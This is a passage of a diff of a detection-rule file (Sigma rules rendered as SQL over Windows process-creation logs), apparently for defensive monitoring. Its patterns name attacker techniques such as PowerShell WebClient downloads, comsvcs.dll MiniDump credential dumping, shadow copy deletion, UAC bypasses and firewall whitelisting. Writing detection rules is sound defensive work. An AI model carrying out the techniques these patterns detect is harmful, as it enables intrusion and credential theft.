'%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "status": "experimental", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Unknown" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", - "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "status": "test", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1546.008" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.004" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE 